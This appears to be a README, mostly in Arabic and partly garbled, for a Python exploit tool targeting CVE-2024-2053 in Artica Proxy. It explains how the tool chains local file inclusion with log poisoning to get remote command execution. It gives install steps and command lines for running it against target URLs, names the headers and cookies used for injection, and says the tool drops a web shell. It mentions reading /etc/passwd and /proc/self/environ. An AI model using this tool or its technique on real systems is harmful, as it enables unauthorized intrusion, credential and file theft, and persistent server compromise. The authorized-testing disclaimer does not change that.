
CVE-2024-2053
يستغل هذا البرنامج النصي Python3 ثغرات تضمين الملفات المحلية (LFI) لتحقيق تنفيذ الأوامر عن بُعد (RCE) عبر تقنيات تسميم السجلات. تم تصميمه خصيصًا لـ Artica Proxy (CVE-2024-2053) ولكنه قابل للتكيف مع سيناريوهات LFI أخرى.
/etc/passwd، /proc/self/environ)git clone https://github.com/yourusername/artica-lfi-rce.git
cd artica-lfi-rce
pip3 install -r requirements.txtpython3 artica.py <target_url> <endpoint> [options]Basic: python3 artica.py http://vulnerable.com /images.listener.php
With proxy: python3 artica.py https://target.com:9000 /vuln.php -p http://127.0.0.1:8080
Verbose mode: python3 artica.py http://victim.com /endpoint.php -v
python3 artica.py /path.php --no-verify
تم توفير هذه الأداة لأغراض تعليمية واختبار الاختراق المصرح به فقط. لا يتحمل المطور أي مسؤولية ولا يكون مسؤولًا عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
MIT License - حقوق النشر (c) 2024
| المكون | الوصف |
|---|---|
| الحمولات |
|
| نقاط الحقن | User-Agent، Referer، ملفات تعريف الارتباط، معلمات GET |
| قشرة الويب | اسم ملف عشوائي (shell_[TIMESTAMP].php) |